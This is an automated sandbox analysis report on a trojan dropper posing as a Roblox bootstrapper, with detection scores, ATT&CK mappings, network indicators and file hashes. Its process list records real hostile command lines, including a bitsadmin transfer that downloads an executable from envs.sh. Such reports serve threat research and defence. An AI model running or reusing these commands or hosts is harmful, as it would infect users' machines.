Windows
Analysis Report
SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe (PID: 7144 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe" MD5: 7AFABB528CE69E3A40DEC6C3253EF854)
- mshta.exe (PID: 6472 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} MD5: 06B02D5C097C7DB1F109749C45F3F505)
- bitsadmin.exe (PID: 3744 cmdline: "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://envs.sh/wUB.exe C:\Users\user\AppData\Local\Temp\cheat.exe MD5: F57A03FA0E654B393BB078D1C60695F3)
- conhost.exe (PID: 3340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- BootstrapperV1.19.exe (PID: 6516 cmdline: "C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe" MD5: 90FD25CED85FE6DB28D21AE7D1F02E2C)
- conhost.exe (PID: 5948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- WerFault.exe (PID: 7240 cmdline: C:\Windows\system32\WerFault.exe -u -p 6516 -s 2184 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
- svchost.exe (PID: 2708 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
System Summary |
---|
Source: | Author: Michael Haag: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: vburov: |
AV Detection |
---|
Source: | Avira: |
Source: | Avira URL Cloud: | ||
Source: | Avira: |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | ReversingLabs: | |||
Source: | Virustotal: | Perma Link |
Source: | Integrated Neural Analysis Model: |
Source: | Joe Sandbox ML: |
Source: | Joe Sandbox ML: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: | ||
Source: | Static PE information: |
Source: | Binary string: | ||
Networking |
---|
Source: | DNS query: |
Source: | File source: | ||
Source: | File source: |
Source: | HTTP traffic detected: | ||
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: | ||
Source: | ASN Name: |
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | HTTP traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | String found in binary or memory: | ||
Source: | Network traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | Code function: | 2_2_00007FFD9B71C864 | |
Source: | Code function: | 2_2_00007FFD9B710E60 | |
Source: | Code function: | 2_2_00007FFD9B710E88 | |
Source: | Code function: | 2_2_00007FFD9B710E00 | |
Source: | Code function: | 2_2_00007FFD9B710DC8 | |
Source: | Code function: | 2_2_00007FFD9B70DA75 | |
Source: | Code function: | 2_2_00007FFD9B710E90 | |
Source: | Code function: | 2_2_00007FFD9B710ED3 |
Source: | Dropped File: |
Source: | Process created: |
Source: | Static PE information: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Key opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | File created: | Jump to behavior |
Source: | Static PE information: |
Source: | Static file information: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | ReversingLabs: | ||
Source: | Virustotal: |
Source: | Process created: | |||
Source: | Section loaded: | Jump to behavior | ||
Source: | Key value queried: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Code function: | 0_2_00007FFD9B7000C1 | |
Source: | Code function: | 2_2_00007FFD9B7159DB | |
Source: | Code function: | 2_2_00007FFD9B7159DB | |
Source: | Code function: | 2_2_00007FFD9B716139 | |
Source: | Code function: | 2_2_00007FFD9B7159DB | |
Source: | Code function: | 2_2_00007FFD9B7159DB | |
Source: | Code function: | 2_2_00007FFD9B70D89B | |
Source: | Code function: | 2_2_00007FFD9B716139 | |
Source: | Code function: | 2_2_00007FFD9B7146D9 |
Source: | Static PE information: |
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: |
Persistence and Installation Behavior |
---|
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Registry key monitored for changes: | Jump to behavior | ||
Source: | Registry key monitored for changes: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Last function: | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Binary or memory string: | ||
Source: | Process information queried: | Jump to behavior |
Source: | Process queried: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | File created: | Jump to dropped file |
Source: | File source: | ||
Source: | Process created: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Key value queried: | Jump to behavior |
Source: | Binary or memory string: | ||
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Exploitation for Client Execution | 1 BITS Jobs | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Query Registry | Remote Services | 1 Email Collection | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | LSASS Memory | 131 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 51 Virtualization/Sandbox Evasion | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 BITS Jobs | NTDS | 51 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Process Injection | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | 3 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Software Packing | DCSync | 23 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
68% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT | ||
57% | Virustotal | Browse | ||
100% | Avira | TR/Dropper.Gen | ||
100% | Joe Sandbox ML |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Avira | TR/Redcap.oczed | ||
100% | Joe Sandbox ML | |||
75% | ReversingLabs | Win32.Trojan.Generic |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
2% | Virustotal | Browse | ||
11% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
1% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | phishing | ||
0% | Avira URL Cloud | safe | ||
12% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
2% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | phishing | ||
2% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | phishing | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
9% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
100% | Avira URL Cloud | phishing | ||
0% | Virustotal | Browse | ||
100% | Avira URL Cloud | phishing | ||
11% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | phishing | ||
12% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | Virustotal | Browse | ||
100% | Avira URL Cloud | phishing | ||
9% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
envs.sh | 89.163.145.170 | true | true | | unknown |
getsolara.dev | 104.21.93.27 | true | false | | unknown |
www.nodejs.org | 104.20.23.46 | true | false | | unknown |
edge-term4-lhr2.roblox.com | 128.116.119.3 | true | false | | unknown |
pastebin.com | 104.20.4.235 | true | true | | unknown |
clientsettings.roblox.com | unknown | unknown | true | | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
false |
| unknown | |
true |
| unknown | |
true |
| unknown | |
false |
| unknown | |
false |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
true |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
true |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
true |
| unknown | ||
true |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
true |
| unknown | ||
true |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown |
IP | Domain | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
104.20.4.235 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | true |
128.116.119.3 | edge-term4-lhr2.roblox.com | United States | 22697 | ROBLOX-PRODUCTIONUS | false |
89.163.145.170 | envs.sh | Germany | 24961 | MYLOC-ASIPBackboneofmyLocmanagedITAGDE | true |
104.21.93.27 | getsolara.dev | United States | 13335 | CLOUDFLARENETUS | false |
104.20.23.46 | www.nodejs.org | United States | 13335 | CLOUDFLARENETUS | false |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1511791 |
Start date and time: | 2024-09-16 12:21:09 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 6m 1s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 16 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe |
Detection: | MAL |
Classification: | mal100.troj.evad.winEXE@11/14@5/6 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 52.168.117.173
- Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target BootstrapperV1.19.exe, PID 6516 because it is empty
- Execution Graph export aborted for target SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe, PID 7144 because it is empty
- Execution Graph export aborted for target bitsadmin.exe, PID 3744 because there are no executed function
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtAllocateVirtualMemory calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
- Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description |
---|---|---|
06:22:22 | API Interceptor | |
06:22:23 | API Interceptor | |
06:22:45 | API Interceptor | |
06:24:18 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
104.20.4.235 | Get hash | malicious | Remcos | Browse |
| |
Get hash | malicious | WSHRAT | Browse |
| ||
Get hash | malicious | WSHRAT | Browse |
| ||
Get hash | malicious | WSHRAT | Browse |
| ||
Get hash | malicious | WSHRAT | Browse |
| ||
Get hash | malicious | WSHRAT | Browse |
| ||
128.116.119.3 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | DCRat | Browse | |||
104.21.93.27 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
104.20.23.46 | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | XWorm | Browse | |||
Get hash | malicious | PureLog Stealer, XWorm, zgRAT | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
www.nodejs.org | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
| |
Get hash | malicious | AsyncRAT, XWorm | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
| ||
pastebin.com | Get hash | malicious | AsyncRAT | Browse |
| |
Get hash | malicious | AsyncRAT, XWorm | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
| ||
Get hash | malicious | AsyncRAT, StormKitty, WorldWind Stealer | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
getsolara.dev | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
| |
Get hash | malicious | AsyncRAT, XWorm | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
edge-term4-lhr2.roblox.com | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
ROBLOX-PRODUCTIONUS | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
| |
Get hash | malicious | AsyncRAT, XWorm | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
MYLOC-ASIPBackboneofmyLocmanagedITAGDE | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | PureLog Stealer | Browse |
| ||
Get hash | malicious | Phisher | Browse |
| ||
Get hash | malicious | Phisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
CLOUDFLARENETUS | Get hash | malicious | HTMLPhisher | Browse |
| |
Get hash | malicious | Azorult, GuLoader | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | K4spreader | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | AsyncRAT | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
28a2c9bd18a11de089ef85a160da29e4 | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
3b5074b1b5d032e5620f69f9f700ff0e | Get hash | malicious | AsyncRAT | Browse |
| |
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | AsyncRAT, XWorm | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 1.3234442710382834 |
Encrypted: | false |
SSDEEP: | 3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvro:KooCEYhgYEL0In |
MD5: | 2BB9D268C96C8367219117E7462E48A9 |
SHA1: | 9AAA1B2A27E8E0FC98B54BD35FD1797EAC00ED89 |
SHA-256: | 54C1AD4ADA0FEEDB3B4090673189C8CFCED280DD5B3F4EB903A971ED9818B271 |
SHA-512: | 36830FCD3E7A92A0EB92739C86826C078B0786F19194E3B7632D81ED4E39F82458D66BB73C27E2680B4A1D297756A2AF2A632EF02DFA971599E2840B8F689569 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.42215743714096754 |
Encrypted: | false |
SSDEEP: | 1536:ZSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Zaza/vMUM2Uvz7DO |
MD5: | 8178096ACF9C13ED2DC1D6CA8C7FA4A0 |
SHA1: | C9745FDF400AD10F7A961B71A91BBB0CC2A4F952 |
SHA-256: | 8594CB32C4EB6A1A83C751719CEA8729177F8BCA9AF8C1EA631A5762881F5DCE |
SHA-512: | 5DEC009A7A972F41AF693F2348C585E85B467FACD415F3FD23ECBBEDA99268F9004888E1A6AF34859B0A25DCB468D9DC409D074BCDD68D59B00E995942839B27 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.07702863859174698 |
Encrypted: | false |
SSDEEP: | 3:8ll8YeEP+05ejjn13a/24D1Zl/illcVO/lnlZMxZNQl:c8zN0Aj53q2LOewk |
MD5: | 90C168266C16C675CAEE004A1965CF03 |
SHA1: | A75F623CC0CA5572F35018C0FA49B912441FE68A |
SHA-256: | 12CC1A4F141055A43901037439AACA7A06AF0E1E7B4D57C32F307483E5DDF38C |
SHA-512: | 424C67376BBC3E4095C068B05C25C1467E11F3A749551950C9A1A090FEC8C9CB111508282CCED93B6BA2E19A67C22AA89FA195CB98A7E0FBEA111BD4F46E8694 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_BootstrapperV1.1_acfe46f69353e7873b32e3e17f3d3a8ab076eb_d2093ef2_c2c7818f-367b-488c-a5c1-1dea1ec5c425\Report.wer
Process: | C:\Windows\System32\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 1.2316132178446182 |
Encrypted: | false |
SSDEEP: | 192:nBRNF2GYr0bU9+dQVa+xkl8vAEZizuiF0Z24lO8g:BJ2GnbG+dQVa+qehZizuiF0Y4lO8g |
MD5: | 6EE99E056ED1B46885F79D9098F2DA7C |
SHA1: | C71D9F15531F0D503C7F3F1D3001A1E0A6AB87FB |
SHA-256: | 5104B59DBF63AF57CD1473CFC777DA68F1665179FC05259666CEE998088AF6CF |
SHA-512: | 9676DA91FA46276ECB7400CE88E3F39F05E622090AA1DFA1E79F169EE26673EA1723744876074CC6C669D82B4579F82931B48DDDEFDC1739E02915F5EB5A0BB4 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 583644 |
Entropy (8bit): | 3.219558383892526 |
Encrypted: | false |
SSDEEP: | 6144:1ajuKR+bGxIl3rc0A+mD/MLwkqWhz3QTT:cC9bGwYD/MLBq+Q |
MD5: | 6393FA891F7B853C7220F5FB451CEBAE |
SHA1: | D144AB591AB4153EEF21031AA11E11E38CE045C7 |
SHA-256: | E2525FCCE0E827295C5262141F288EAE4E1BDCAF8DD5F373749F71939DCE379B |
SHA-512: | 5BD2D8270F2D4A32022FEA7BED3A75AC4155D6FF8D90D767DAB0A236D6CD6ECBFD9AECF1B1DE68D091EBB64574DEC48ED7BE86F9B3C5149D7BDE3489892BFBD4 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6820 |
Entropy (8bit): | 3.7180438023880322 |
Encrypted: | false |
SSDEEP: | 96:RSIU6o7wVetbxqMsRXYZL/8n1vm5aM4U389b44Dr4rVfrIm:R6l7wVeJxqFRXYZj81Gpr389b44cfrIm |
MD5: | 8A6C5D4761801CB13EF373DCAD704BD5 |
SHA1: | 36AE52419DED28A1C07F560D0CABA843B7819A5D |
